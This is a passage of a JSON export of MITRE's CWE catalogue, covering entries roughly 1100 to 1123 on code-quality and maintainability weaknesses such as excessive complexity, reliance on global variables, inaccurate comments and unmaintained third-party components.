and/or maintain the software due to inconsistencies, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1100":{"attr":{"@_ID":"1100","@_Name":"Insufficient Isolation of System-Dependent Functions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product or code does not isolate system-dependent\\n\\t\\t\\t\\t\\tfunctionality into separate standalone modules.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain and/or port the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1061","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1101":{"attr":{"@_ID":"1101","@_Name":"Reliance on Runtime Component in Generated Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product uses automatically-generated code that cannot be\\n\\t\\t\\t\\t\\texecuted without a specific runtime support component.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."}}},"1102":{"attr":{"@_ID":"1102","@_Name":"Reliance on Machine-Dependent Data Representation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code uses a data representation that relies on low-level\\n\\t\\t\\t\\t\\tdata representation or constructs that may vary across different processors,\\n\\t\\t\\t\\t\\tphysical machines, OSes, or other physical components.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain and/or port the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"758","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1105","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1103":{"attr":{"@_ID":"1103","@_Name":"Use of Platform-Dependent Third Party Components","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product relies on third-party software components that do\\n\\t\\t\\t\\t\\tnot provide equivalent functionality across all desirable\\n\\t\\t\\t\\t\\tplatforms.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"758","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."}}},"1104":{"attr":{"@_ID":"1104","@_Name":"Use of Unmaintained Third Party Components","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product relies on third-party components that are not\\n\\t\\t\\t\\t\\tactively supported or maintained by the original developer or a trusted proxy\\n\\t\\t\\t\\t\\tfor the original developer.","Extended_Description":{"xhtml:p":["Reliance on components that are no longer maintained can make it difficult or impossible to fix significant bugs, vulnerabilities, or quality issues. In effect, unmaintained code can become obsolete.","This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."}}},"1105":{"attr":{"@_ID":"1105","@_Name":"Insufficient Encapsulation of Machine-Dependent Functionality","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product or code uses machine-dependent functionality, but\\n\\t\\t\\t\\t\\tit does not sufficiently encapsulate or isolate this functionality from\\n\\t\\t\\t\\t\\tthe rest of the code.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to port or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"758","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1061","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1106":{"attr":{"@_ID":"1106","@_Name":"Insufficient Use of Symbolic Constants","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The source code uses literal constants that may need to change\\n\\t\\t\\t\\t\\tor evolve over time, instead of using symbolic constants.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1107":{"attr":{"@_ID":"1107","@_Name":"Insufficient Isolation of Symbolic Constant Definitions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The source code uses symbolic constants, but it does not\\n\\t\\t\\t\\t\\tsufficiently place the definitions of these constants into a more centralized or\\n\\t\\t\\t\\t\\tisolated location.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1108":{"attr":{"@_ID":"1108","@_Name":"Excessive Reliance on Global Variables","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code is structured in a way that relies too much on using\\n\\t\\t\\t\\t\\tor setting global variables throughout various points in the code, instead of\\n\\t\\t\\t\\t\\tpreserving the associated information in a narrower, more local\\n\\t\\t\\t\\t\\tcontext.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1109":{"attr":{"@_ID":"1109","@_Name":"Use of Same Variable for Multiple Purposes","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code contains a callable, block, or other code element in\\n\\t\\t\\t\\t\\twhich the same variable is used to control more than one unique task or store\\n\\t\\t\\t\\t\\tmore than one instance of data.","Extended_Description":{"xhtml:p":["Use of the same variable for multiple purposes can make it more difficult for a person to read or understand the code, potentially hiding other quality issues.","This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1110":{"attr":{"@_ID":"1110","@_Name":"Incomplete Design Documentation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product\'s design documentation does not adequately describe\\n\\t\\t\\t\\t\\tcontrol flow, data flow, system initialization, relationships between tasks,\\n\\t\\t\\t\\t\\tcomponents, rationales, or other important aspects of the\\n\\t\\t\\t\\t\\tdesign.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1059","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1111":{"attr":{"@_ID":"1111","@_Name":"Incomplete I/O Documentation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product\'s documentation does not adequately define inputs,\\n\\t\\t\\t\\t\\toutputs, or system/software interfaces.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1059","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1112":{"attr":{"@_ID":"1112","@_Name":"Incomplete Documentation of Program Execution","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The document does not fully define all mechanisms that are used\\n\\t\\t\\t\\t\\tto control or influence how product-specific programs are\\n\\t\\t\\t\\t\\texecuted.","Extended_Description":{"xhtml:p":"This includes environmental variables, configuration files, registry keys, command-line switches or options, or system settings."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1059","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1113":{"attr":{"@_ID":"1113","@_Name":"Inappropriate Comment Style","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The source code uses comment styles or formats that are\\n\\t\\t\\t\\t\\tinconsistent or do not follow expected standards for the\\n\\t\\t\\t\\t\\tproduct.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software due to insufficient legibility, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1114":{"attr":{"@_ID":"1114","@_Name":"Inappropriate Whitespace Style","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The source code contains whitespace that is inconsistent across\\n\\t\\t\\t\\t\\tthe code or does not follow expected standards for the\\n\\t\\t\\t\\t\\tproduct.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand and maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1115":{"attr":{"@_ID":"1115","@_Name":"Source Code Element without Standard Prologue","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The source code contains elements such as source files \\n\\t\\t\\t\\t\\tthat do not consistently provide a prologue or header that has been\\n\\t\\t\\t\\t\\tstandardized for the project.","Extended_Description":{"xhtml:p":["The lack of a prologue can make it more difficult to accurately and quickly understand the associated code. Standard prologues or headers may contain information such as module name, version number, author, date, purpose, function, assumptions, limitations, accuracy considerations, etc.","This issue makes it more difficult to maintain the software due to insufficient analyzability, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1116":{"attr":{"@_ID":"1116","@_Name":"Inaccurate Comments","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The source code contains comments that do not accurately\\n\\t\\t\\t\\t\\tdescribe or explain aspects of the portion of the code with which the comment is\\n\\t\\t\\t\\t\\tassociated.","Extended_Description":{"xhtml:p":["When a comment does not accurately reflect the associated code elements, this can introduce confusion to a reviewer (due to inconsistencies) or make it more difficult and less efficient to validate that the code is implementing the intended behavior correctly.","This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1117":{"attr":{"@_ID":"1117","@_Name":"Callable with Insufficient Behavioral Summary","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code contains a function or method whose signature and/or associated\\n\\t\\t\\t\\t\\tinline documentation does not sufficiently describe the callable\'s inputs, outputs,\\n\\t\\t\\t\\t\\tside effects, assumptions, or return codes.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1118":{"attr":{"@_ID":"1118","@_Name":"Insufficient Documentation of Error Handling Techniques","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The documentation does not sufficiently describe the techniques\\n\\t\\t\\t\\t\\tthat are used for error handling, exception processing, or similar\\n\\t\\t\\t\\t\\tmechanisms.","Extended_Description":{"xhtml:p":"Documentation may need to cover error handling techniques at multiple layers, such as module, executable, compilable code unit, or callable."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1059","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1119":{"attr":{"@_ID":"1119","@_Name":"Excessive Use of Unconditional Branching","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code uses too many unconditional branches (such as\\n\\t\\t\\t\\t\\t\\"goto\\").","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1120":{"attr":{"@_ID":"1120","@_Name":"Excessive Code Complexity","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code is too complex, as calculated using a well-defined,\\n\\t\\t\\t\\t\\tquantitative measure.","Extended_Description":{"xhtml:p":["This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities.","This issue can make the software perform more slowly.  If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":[{"Scope":"Other","Impact":"Reduce Maintainability"},{"Scope":"Other","Impact":"Reduce Performance"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1121":{"attr":{"@_ID":"1121","@_Name":"Excessive McCabe Cyclomatic Complexity","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code contains McCabe cyclomatic complexity that exceeds a\\n\\tdesirable maximum.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-11"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-963"}},{"attr":{"@_External_Reference_ID":"REF-964"}},{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-11"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1122":{"attr":{"@_ID":"1122","@_Name":"Excessive Halstead Complexity","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code is structured in a way that a Halstead complexity\\n\\t\\t\\t\\t\\tmeasure exceeds a desirable maximum.","Extended_Description":{"xhtml:p":["A variety of Halstead complexity measures exist, such as program vocabulary size or volume.","This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-963"}},{"attr":{"@_External_Reference_ID":"REF-965"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1123":{"attr":{"@_ID":"1123","@_Name":"Excessive Use of Self-Modifying Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product uses too much self-modifying\\n\\t\\t\\t\\t\\tcode.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated 